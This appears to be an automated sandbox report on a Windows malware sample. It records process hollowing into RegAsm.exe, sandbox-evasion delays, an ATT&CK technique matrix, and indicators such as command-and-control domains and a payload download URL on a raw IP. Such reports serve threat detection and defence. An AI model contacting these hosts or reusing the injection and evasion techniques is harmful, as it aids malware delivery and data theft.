        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: qoqD1RxV0F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: qoqD1RxV0F.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: qoqD1RxV0F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.pdb source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002494000.00000004.00000800.00020000.00000000.sdmp
        Source: qoqD1RxV0F.exeStatic PE information: 0x9484AD59 [Wed Dec 16 09:18:17 2048 UTC]
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline"
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh7_2_0043D812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00443469 push ebp; iretd 7_2_0044346C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044366E push 9F00CD97h; ret 7_2_004436B1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h7_2_0043AE3E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004477A5 push ebp; iretd 7_2_004477AA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.dllJump to dropped file
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: Yara matchFile source: Process Memory Space: qoqD1RxV0F.exe PID: 7136, type: MEMORYSTR
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory allocated: 2340000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory allocated: 43F0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.dllJump to dropped file
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exe TID: 4148Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exe TID: 5316Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1560Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6512Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: RegAsm.exe, 00000007.00000002.2136124408.0000000000CC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@U
        Source: RegAsm.exe, 00000007.00000002.2136531236.0000000000CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: qoqD1RxV0F.exe, 00000000.00000002.2054729715.0000000000622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043C1F0 LdrInitializeThunk,7_2_0043C1F0
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: 0.2.qoqD1RxV0F.exe.24c281c.0.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
        Source: 0.2.qoqD1RxV0F.exe.24c281c.0.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
        Source: 0.2.qoqD1RxV0F.exe.24c281c.0.raw.unpack, Engineers.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeFile written: C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.0.csJump to dropped file
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
        Source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: volcanoyev.click
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 721008Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline"Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES634D.tmp" "c:\Users\user\AppData\Local\Temp\ldukos0s\CSCAE8F24CA40C840259D2783B6D24C303E.TMP"Jump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeQueries volume information: C:\Users\user\Desktop\qoqD1RxV0F.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\qoqD1RxV0F.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        511
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Shared Modules
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        1
        Disable or Modify Tools
        LSASS Memory1
        Process Discovery
        Remote Desktop Protocol2
        Clipboard Data
        11
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        Logon Script (Windows)Logon Script (Windows)31
        Virtualization/Sandbox Evasion
        Security Account Manager31
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook511
        Process Injection
        NTDS12
        System Information Discovery
        Distributed Component Object ModelInput Capture124
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Deobfuscate/Decode Files or Information
        LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
        Obfuscated Files or Information
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Timestomp
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580260 Sample: qoqD1RxV0F.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 37 volcanoyev.click 2->37 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Antivirus detection for URL or domain 2->45 47 13 other signatures 2->47 8 qoqD1RxV0F.exe 15 10 2->8         started        signatures3 process4 dnsIp5 39 147.45.44.131, 49704, 80 FREE-NET-ASFREEnetEU Russian Federation 8->39 27 C:\Users\user\AppData\...\ldukos0s.cmdline, Unicode 8->27 dropped 29 C:\Users\user\AppData\Local\...\ldukos0s.0.cs, Unicode 8->29 dropped 31 C:\Users\user\AppData\...\qoqD1RxV0F.exe.log, CSV 8->31 dropped 49 Writes to foreign memory regions 8->49 51 Allocates memory in foreign processes 8->51 53 Sample uses process hollowing technique 8->53 55 3 other signatures 8->55 13 csc.exe 3 8->13         started        16 RegAsm.exe 8->16         started        19 RegAsm.exe 8->19         started        21 RegAsm.exe 8->21         started        file6 signatures7 process8 dnsIp9 33 C:\Users\user\AppData\Local\...\ldukos0s.dll, PE32 13->33 dropped 23 conhost.exe 13->23         started        25 cvtres.exe 1 13->25         started        35 volcanoyev.click 172.67.195.241, 443, 49705, 49706 CLOUDFLARENETUS United States 16->35 file10 process11

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        qoqD1RxV0F.exe40%VirustotalBrowse
        qoqD1RxV0F.exe100%AviraHEUR/AGEN.1306918
        qoqD1RxV0F.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.dll100%AviraHEUR/AGEN.1300034
        C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.dll100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://147.45.44.131/infopage/inbg.exeP0%Avira URL Cloudsafe
        https://volcanoyev.click:443/api100%Avira URL Cloudmalware
        https://volcanoyev.click/100%Avira URL Cloudmalware
        volcanoyev.click100%Avira URL Cloudmalware
        https://volcanoyev.click/api100%Avira URL Cloudmalware
        http://147.45.44.131/infopage/inbg.exe0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        volcanoyev.click
        172.67.195.241
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          volcanoyev.clicktrue
          • Avira URL Cloud: malware
          unknown
          necklacebudi.latfalse
            high
            http://147.45.44.131/infopage/inbg.exetrue
            • Avira URL Cloud: safe
            unknown
            sustainskelet.latfalse
              high
              crosshuaht.latfalse
                high
                rapeflowwj.latfalse
                  high
                  aspecteirs.latfalse
                    high
                    grannyejh.latfalse
                      high
                      energyaffai.latfalse
                        high
                        discokeyus.latfalse
                          high
                          https://volcanoyev.click/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://147.45.44.131/infopage/inbg.exePqoqD1RxV0F.exe, 00000000.00000002.2055586170.00000000023F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://volcanoyev.click:443/apiRegAsm.exe, 00000007.00000002.2136531236.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://volcanoyev.click/RegAsm.exe, 00000007.00000002.2136531236.0000000000CF4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameqoqD1RxV0F.exe, 00000000.00000002.2055586170.000000000245B000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
